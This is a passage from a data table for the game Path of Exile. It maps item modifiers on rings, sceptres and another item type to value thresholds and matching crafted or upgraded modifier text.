"+#% chance to Evade Attacks": [(3, '(7 - 9)% increased Evasion Rating'), (5, '(10 - 12)% increased Evasion Rating'), (10, '(13 - 15)% increased Evasion Rating\nGrace has (15 - 20)% increased Aura Effect')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (70, '(18 - 20) to Global Critical Strike Multiplier'), (90, '(21 - 23) to Global Critical Strike Multiplier'), (105, '(24 - 26) to Global Critical Strike Multiplier'), (300, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Adds # to # Chaos Damage to Attacks": [(25, '8% increased Chaos Damage'), (45, '(9 - 10)% increased Chaos Damage'), (100, '(11 - 12)% increased Chaos Damage')],
"Adds # to # Cold Damage": [(25, '(9 - 10)% increased Cold Damage'), (100, '(11 - 12)% increased Cold Damage')],
"Adds # to # Cold Damage to Attacks": [(15, '8% increased Cold Damage'), (22, '(9 - 10)% increased Cold Damage'), (33, '(11 - 12)% increased Cold Damage'), (42, '(13 - 14)% increased Cold Damage'), (100, '(15 - 16)% increased Cold Damage\n(15 - 25)% of Physical Damage Converted to Cold Damage')],
"Adds # to # Fire Damage": [(25, '(9 - 10)% increased Fire Damage'), (100, '(11 - 12)% increased Fire Damage')],
"Adds # to # Fire Damage to Attacks": [(15, '8% increased Fire Damage'), (25, '(9 - 10)% increased Fire Damage'), (35, '(11 - 12)% increased Fire Damage'), (45, '(13 - 14)% increased Fire Damage'), (100, '(15 - 16)% increased Fire Damage\n(15 - 25)% of Physical Damage Converted to Fire Damage')],
"Adds # to # Lightning Damage": [(40, '(9 - 10)% increased Lightning Damage'), (100, '(11 - 12)% increased Lightning Damage')],
"Adds # to # Lightning Damage to Attacks": [(30, '8% increased Lightning Damage'), (45, '(9 - 10)% increased Lightning Damage'), (60, '(11 - 12)% increased Lightning Damage'), (75, '(13 - 14)% increased Lightning Damage'), (100, '(15 - 16)% increased Lightning Damage\n(15 - 25)% of Physical Damage Converted to Lightning Damage')],
"Adds # to # Physical Damage to Attacks": [(8, '8% increased Global Physical Damage'), (16, '(9 - 10)% increased Global Physical Damage'), (24, '(11 - 12)% increased Global Physical Damage'), (28, '(13 - 14)% increased Global Physical Damage'), (50, '(15 - 16)% increased Global Physical Damage\n(9 - 10)% reduced Enemy Stun Threshold')],
"Damage Penetrates #% Elemental Resistances": [(6, '(17 - 19)% increased Elemental Damage'), (12, '(20 - 22)% increased Elemental Damage'), (50, '(23 - 26)% increased Elemental Damage')],
"Gain #% of Physical Damage as Extra Fire Damage": [(11, '(11 - 12)% increased Fire Damage'), (22, '(13 - 14)% increased Fire Damage'), (50, '(15 - 16)% increased Fire Damage\nGain (6 - 8)% of Physical Damage as Extra Fire Damage')],
"Minions have #% increased Movement Speed": [(40, 'Minions have (4 - 5)% increased Movement Speed'), (75, 'Minions have (6 - 7)% increased Movement Speed'), (200, 'Minions have (8 - 10)% increased Movement Speed')],
"Projectiles Pierce an additional Target": [(5, 'Arrows Pierce an additional Target'), (10, 'Arrows Pierce an additional Target')],
},
"Ring": {
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"# to # Cold Damage per Frenzy Charge": [(10, '(11 - 12)% increased Cold Damage'), (15, '(13 - 14)% increased Cold Damage'), (50, '(15 - 16)% increased Cold Damage\n4 to 7 Cold Damage per Frenzy Charge')],
"#% chance when Hit for double Armour effect": [(25, '(7 - 9)% increased Armour'), (50, '(10 - 12)% increased Armour'), (100, '(13 - 15)% increased Armour\nDetermination has (15 - 20)% increased Aura Effect')],
"#% faster start of Energy Shield Recharge": [(65, '(8 - 9)% increased Energy Shield Recharge Rate'), (100, '(10 - 11)% increased Energy Shield Recharge Rate\n(4 - 6)% faster start of Energy Shield Recharge')],
"#% increased Attack Speed": [(15, '4% increased Attack Speed'), (50, '5% increased Attack Speed')],
"#% increased Cast Speed": [(15, '4% increased Cast Speed'), (50, '5% increased Cast Speed')],
"#% increased Chaos Damage": [(20, '8% increased Chaos Damage'), (40, '(9 - 10)% increased Chaos Damage'), (60, '(11 - 12)% increased Chaos Damage'), (80, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage\nAdds (11 - 13) to (19 - 23) Chaos Damage')],
"#% increased Cold Damage": [(20, '8% increased Cold Damage'), (40, '(9 - 10)% increased Cold Damage'), (60, '(11 - 12)% increased Cold Damage'), (80, '(13 - 14)% increased Cold Damage'), (200, '(15 - 16)% increased Cold Damage\nAdds (12 - 16) to (24 - 28) Cold Damage')],
"#% increased Damage": [(25, '(10 - 11)% increased Damage'), (55, '(12 - 13)% increased Damage'), (100, '(14 - 15)% increased Damage')],
"#% increased Damage with Ailments": [(30, '8% increased Damage with Ailments'), (60, '(9 - 10)% increased Damage with Ailments'), (90, '(11 - 12)% increased Damage with Ailments'), (105, '(13 - 14)% increased Damage with Ailments'), (200, '(15 - 16)% increased Damage with Ailments\nPoisons you inflict deal Damage (7 - 10)% faster\nBleeding you inflict deals Damage (7 - 10)% faster\nIgnites you inflict deal Damage (7 - 10)% faster')],
"#% increased Damage with Poison": [(50, '(10 - 11)% increased Damage with Poison'), (100, '(12 - 13)% increased Damage with Poison'), (200, '(14 - 15)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Effect of non-Damaging Ailments on Enemies": [(80, '(7 - 10)% increased Effect of Chill\n(7 - 10)% increased Effect of Shock'), (100, '(11 - 15)% increased Effect of Chill\n(11 - 15)% increased Effect of Shock')],
"#% increased Elemental Damage": [(20, '8% increased Elemental Damage'), (40, '(9 - 10)% increased Elemental Damage'), (60, '(11 - 12)% increased Elemental Damage'), (80, '(13 - 14)% increased Elemental Damage'), (200, '(15 - 16)% increased Elemental Damage\n0.2% of Elemental Damage Leeched as Life')],
"#% increased Elemental Damage with Attack Skills": [(40, '(12 - 13)% increased Elemental Damage with Attack Skills'), (80, '(14 - 15)% increased Elemental Damage with Attack Skills'), (115, '(16 - 18)% increased Elemental Damage with Attack Skills'), (130, '(19 - 21)% increased Elemental Damage with Attack Skills'), (200, '(22 - 24)% increased Elemental Damage with Attack Skills\nCurse Enemies with Level 5 Elemental Weakness on Hit')],
"#% increased Energy Shield from Body Armour": [(20, '(8 - 9)% increased Energy Shield Recharge Rate'), (40, '(10 - 11)% increased Energy Shield Recharge Rate'), (100, '(12 - 15)% increased Energy Shield Recharge Rate\nDiscipline has (15 - 20)% increased Aura Effect')],
"#% increased Fire Damage": [(20, '8% increased Fire Damage'), (40, '(9 - 10)% increased Fire Damage'), (60, '(11 - 12)% increased Fire Damage'), (80, '(13 - 14)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage\nAdds (13 - 18) to (28 - 33) Fire Damage')],
"#% increased Global Critical Strike Chance": [(30, '(14 - 15)% increased Global Critical Strike Chance'), (60, '(16 - 17)% increased Global Critical Strike Chance'), (100, '(18 - 20)% increased Global Critical Strike Chance')],
"#% increased Global Physical Damage": [(40, '(9 - 10)% increased Global Physical Damage'), (100, '(11 - 12)% increased Global Physical Damage')],
"#% increased Life Recovery from Flasks": [(40, '4% increased maximum Life'), (80, '(5 - 6)% increased maximum Life'), (200, '(7 - 8)% increased maximum Life\n(7 - 10)% increased Life Recovery from Flasks')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\n2% increased Experience gain')],
"#% increased Lightning Damage": [(20, '8% increased Lightning Damage'), (40, '(9 - 10)% increased Lightning Damage'), (60, '(11 - 12)% increased Lightning Damage'), (80, '(13 - 14)% increased Lightning Damage'), (200, '(15 - 16)% increased Lightning Damage\nAdds (1 - 5) to (50 - 52) Lightning Damage')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n(3.02 - 4.0) Mana Regenerated per second')],
"#% increased Rarity of Items found": [(50, '(19 - 20)% increased Rarity of Items found'), (100, '(21 - 22)% increased Rarity of Items found'), (145, '(23 - 25)% increased Rarity of Items found'), (200, '(4 - 5)% increased Movement Speed')],
"#% of Chaos Damage Leeched as Life": [(0.25, '(11 - 12)% increased Chaos Damage'), (0.5, '(13 - 14)% increased Chaos Damage'), (1.0, '(15 - 16)% increased Chaos Damage\n0.2% of Chaos Damage Leeched as Life')],
"#% of Cold Damage Leeched as Life": [(0.25, '(11 - 12)% increased Cold Damage'), (0.5, '(13 - 14)% increased Cold Damage'), (1.0, '(15 - 16)% increased Cold Damage\n0.2% of Cold Damage Leeched as Life')],
"#% of Damage taken gained as Mana over 4 seconds when Hit": [(8, '(2.0 - 2.5) Mana Regenerated per second'), (16, '(2.52 - 3.0) Mana Regenerated per second'), (50, '(3.02 - 4.0) Mana Regenerated per second')],
"#% of Fire Damage Leeched as Life": [(0.25, '(11 - 12)% increased Fire Damage'), (0.5, '(13 - 14)% increased Fire Damage'), (1.0, '(15 - 16)% increased Fire Damage\n0.2% of Fire Damage Leeched as Life')],
"#% of Lightning Damage Leeched as Life": [(0.25, '(11 - 12)% increased Lightning Damage'), (0.5, '(13 - 14)% increased Lightning Damage'), (1.0, '(15 - 16)% increased Lightning Damage\n0.2% of Lightning Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Life": [(0.7, '(13 - 16)% increased Damage while Leeching Life'), (1.0, '(17 - 21)% increased Damage while Leeching Life'), (4.0, '(22 - 25)% increased Damage while Leeching Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (0.7, '(13 - 16)% increased Damage while Leeching Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (1.0, '(17 - 21)% increased Damage while Leeching Mana'), (4.0, '(22 - 25)% increased Damage while Leeching Mana')],
"#% of Physical Damage Leeched as Life": [(0.25, '(11 - 12)% increased Global Physical Damage'), (0.5, '(13 - 14)% increased Global Physical Damage'), (1.0, '(15 - 16)% increased Global Physical Damage\n0.2% of Physical Damage Leeched as Life')],
"#% reduced Mana Cost of Skills": [(10, '2% reduced Mana Cost of Skills'), (20, '3% reduced Mana Cost of Skills'), (50, '(4 - 5)% reduced Mana Cost of Skills')],
"#% reduced Reflected Damage taken": [(11, '(8 - 5)% reduced Reflected Damage taken'), (22, '(12 - 9)% reduced Reflected Damage taken'), (50, '(15 - 13)% reduced Reflected Damage taken')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (6, '(9 - 15) Life gained for each Enemy hit by your Attacks')],
"+# Life gained on Kill": [(15, '(6 - 8) Life gained on Kill'), (25, '(9 - 11) Life gained on Kill'), (35, '(12 - 15) Life gained on Kill'), (100, '(12 - 15) Life gained on Kill\nRecover (1 - 2)% of Maximum Life on Kill')],
"+# Mana gained on Kill": [(5, '3 Mana gained on Kill'), (10, '4 Mana gained on Kill'), (15, '5 Mana gained on Kill'), (50, '5 Mana gained on Kill\nRecover (1 - 2)% of Maximum Mana on Kill')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (1400, '(18 - 20)% increased Global Accuracy Rating'), (2000, '(18 - 20)% increased Global Accuracy Rating\n(150 - 250) to Accuracy Rating')],
"+# to Armour": [(400, '(7 - 9)% increased Armour'), (700, '(10 - 12)% increased Armour'), (1500, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '6% increased Dexterity\nYou gain Onslaught for 4.0 seconds on Hit')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(150, '(7 - 9)% increased Evasion Rating'), (300, '(10 - 12)% increased Evasion Rating'), (450, '(13 - 15)% increased Evasion Rating'), (1000, '(13 - 15)% increased Evasion Rating\n(16 - 25)% chance to Avoid Elemental Ailments')],
"+# to Intelligence": [(100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '6% increased Intelligence\n100% chance to Gain Arcane Surge on Hit with Spells')],
"+# to Level of Socketed Gems": [(4, 'Grants Level 10 Anger Skill\nGrants Level 10 Hatred Skill\nGrants Level 10 Wrath Skill'), (7, 'Grants Level 15 Anger Skill\nGrants Level 15 Hatred Skill\nGrants Level 15 Wrath Skill'), (20, 'Has 1 Socket')],
"+# to Minimum Endurance Charges": [(1, '(8 - 11)% increased Endurance Charge Duration'), (2, '(12 - 15)% increased Endurance Charge Duration'), (5, '0.3% of maximum Life Regenerated per second per Endurance Charge')],
"+# to Minimum Frenzy Charges": [(1, '(8 - 11)% increased Frenzy Charge Duration'), (2, '(12 - 15)% increased Frenzy Charge Duration'), (5, '6% increased Evasion Rating per Frenzy Charge')],
"+# to Minimum Power Charges": [(1, '(8 - 11)% increased Power Charge Duration'), (2, '(12 - 15)% increased Power Charge Duration'), (5, '6% increased Spell Damage per Power Charge')],
"+# to Strength": [(100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '6% increased Strength\n100% chance to Intimidate Enemies for 4 seconds on Hit with Attacks')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Total Mana Cost of Skills": [(12, '-1 to Total Mana Cost of Skills'), (24, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"+# to all Attributes": [(15, '(6 - 7) to all Attributes'), (30, '(8 - 9) to all Attributes'), (45, '(10 - 12) to all Attributes'), (100, '6% increased Strength\n6% increased Dexterity\n6% increased Intelligence\n1 to Maximum Endurance Charges\n1 to Maximum Frenzy Charges\n1 to Maximum Power Charges')],
"+# to maximum Energy Shield": [(50, '(4 - 5)% increased maximum Energy Shield'), (100, '(6 - 7)% increased maximum Energy Shield'), (130, '(8 - 10)% increased maximum Energy Shield'), (500, '(8 - 10)% increased maximum Energy Shield\n(7 - 10)% faster start of Energy Shield Recharge')],
"+# to maximum Life": [(200, '4% increased maximum Life'), (230, '(5 - 6)% increased maximum Life'), (1000, '(7 - 8)% increased maximum Life')],
"+# to maximum Mana": [(100, '6% increased maximum Mana'), (200, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+#% chance to Evade Attacks": [(3, '(7 - 9)% increased Evasion Rating'), (5, '(10 - 12)% increased Evasion Rating'), (10, '(13 - 15)% increased Evasion Rating\nGrace has (15 - 20)% increased Aura Effect')],
"+#% to Chaos Resistance": [(70, '(-17 - -13) Chaos Damage taken'), (120, '(-31 - -18) Chaos Damage taken')],
"+#% to Cold Resistance": [(50, '(-15 - -10) Cold Damage taken when Hit'), (100, '(-40 - -16) Cold Damage taken when Hit'), (150, '(-80 - -40) Cold Damage taken when Hit')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Critical Strike Multiplier if you've Shattered an Enemy Recently": [(35, '12 to Global Critical Strike Multiplier'), (55, '(13 - 14) to Global Critical Strike Multiplier'), (100, '(15 - 16) to Global Critical Strike Multiplier')],
"+#% to Fire Resistance": [(50, '(-15 - -10) Fire Damage taken when Hit'), (100, '(-40 - -16) Fire Damage taken when Hit'), (150, '(-80 - -40) Fire Damage taken when Hit')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(30, '(15 - 16) to Global Critical Strike Multiplier'), (60, '(17 - 18) to Global Critical Strike Multiplier'), (100, '(19 - 20) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '(-15 - -10) Lightning Damage taken when Hit'), (100, '(-40 - -16) Lightning Damage taken when Hit'), (150, '(-80 - -40) Lightning Damage taken when Hit')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to all Elemental Resistances": [(15, '(-15 - -10) Fire Damage taken when Hit\n(-15 - -10) Cold Damage taken when Hit\n(-15 - -10) Lightning Damage taken when Hit'), (30, '(-40 - -16) Fire Damage taken when Hit\n(-40 - -16) Cold Damage taken when Hit\n(-40 - -16) Lightning Damage taken when Hit'), (45, '(-80 - -40) Fire Damage taken when Hit\n(-80 - -40) Cold Damage taken when Hit\n(-80 - -40) Lightning Damage taken when Hit'), (100, '(-80 - -40) Fire Damage taken when Hit\n(-80 - -40) Cold Damage taken when Hit\n(-80 - -40) Lightning Damage taken when Hit\nGrants Level 25 Purity of Fire Skill\nGrants Level 25 Purity of Ice Skill\nGrants Level 25 Purity of Lightning Skill')],
"Adds # to # Chaos Damage to Attacks": [(40, '(11 - 12)% increased Chaos Damage'), (75, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage')],
"Adds # to # Cold Damage": [(20, '8% increased Cold Damage'), (40, '(9 - 10)% increased Cold Damage'), (100, '(11 - 12)% increased Cold Damage')],
"Adds # to # Cold Damage to Attacks": [(30, '(11 - 12)% increased Cold Damage'), (60, '(13 - 14)% increased Cold Damage'), (90, '(15 - 16)% increased Cold Damage'), (105, '(15 - 16)% increased Cold Damage\nCurse Enemies with Level 5 Frostbite on Hit')],
"Adds # to # Fire Damage": [(20, '8% increased Fire Damage'), (40, '(9 - 10)% increased Fire Damage'), (100, '(11 - 12)% increased Fire Damage')],
"Adds # to # Fire Damage to Attacks": [(40, '(11 - 12)% increased Fire Damage'), (80, '(13 - 14)% increased Fire Damage'), (120, '(15 - 16)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage\nCurse Enemies with Level 5 Flammability on Hit')],
"Adds # to # Lightning Damage": [(35, '8% increased Lightning Damage'), (65, '(9 - 10)% increased Lightning Damage'), (100, '(11 - 12)% increased Lightning Damage')],
"Adds # to # Lightning Damage to Attacks": [(75, '(11 - 12)% increased Lightning Damage'), (150, '(13 - 14)% increased Lightning Damage'), (190, '(15 - 16)% increased Lightning Damage'), (300, '(15 - 16)% increased Lightning Damage\nCurse Enemies with Level 5 Conductivity on Hit')],
"Adds # to # Physical Damage to Attacks": [(20, '(11 - 12)% increased Global Physical Damage'), (30, '(13 - 14)% increased Global Physical Damage'), (40, '(15 - 16)% increased Global Physical Damage'), (100, '(15 - 16)% increased Global Physical Damage\nCurse Enemies with Level 5 Vulnerability on Hit')],
"Cannot be Shocked or Ignited while moving": [(1, '(13 - 14)% chance to Avoid being Ignited\n(13 - 14)% chance to Avoid being Shocked'), (2, '(15 - 17)% chance to Avoid being Ignited\n(15 - 17)% chance to Avoid being Shocked'), (5, '(18 - 20)% chance to Avoid being Ignited\n(18 - 20)% chance to Avoid being Shocked')],
"Gain #% of Physical Damage as Extra Fire Damage": [(11, '(11 - 12)% increased Fire Damage'), (22, '(13 - 14)% increased Fire Damage'), (50, '(15 - 16)% increased Fire Damage\nGain (3 - 5)% of Physical Damage as Extra Fire Damage')],
"Minions have #% increased Movement Speed": [(40, 'Minions have (4 - 5)% increased Movement Speed'), (75, 'Minions have (6 - 7)% increased Movement Speed'), (200, 'Minions have (8 - 10)% increased Movement Speed')],
"Shock nearby Enemies for # Seconds when you Focus": [(10.0, '(8 - 10)% increased Shock Duration on Enemies'), (15.0, '(12 - 15)% increased Shock Duration on Enemies')],
"Vaal Skills deal #% increased Damage": [(55, 'Vaal Skills deal (13 - 16)% increased Damage'), (110, 'Vaal Skills deal (17 - 21)% increased Damage'), (200, '(15 - 20)% increased Damage if Corrupted')],
},
"Sceptre": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Ignite": [(20, '6% chance to Ignite'), (40, '7% chance to Ignite'), (200, '8% chance to Ignite\n(8 - 10)% increased Ignite Duration on Enemies')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Shock": [(20, '6% chance to Shock'), (40, '7% chance to Shock'), (200, '8% chance to Shock\n(8 - 10)% increased Shock Duration on Enemies')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed\n(5 - 6)% increased Cast Speed'), (50, '(5 - 6)% increased Attack Speed\n(7 - 9)% increased Cast Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Burning Damage": [(35, '(14 - 18)% increased Burning Damage'), (70, '(19 - 23)% increased Burning Damage'), (500, '(24 - 28)% increased Burning Damage\nIgnites you inflict deal Damage (15 - 20)% faster')],
"#% increased Cast Speed": [(40, '(5 - 6)% increased Cast Speed'), (65, '(7 - 9)% increased Cast Speed'), (200, '(10 - 12)% increased Cast Speed')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
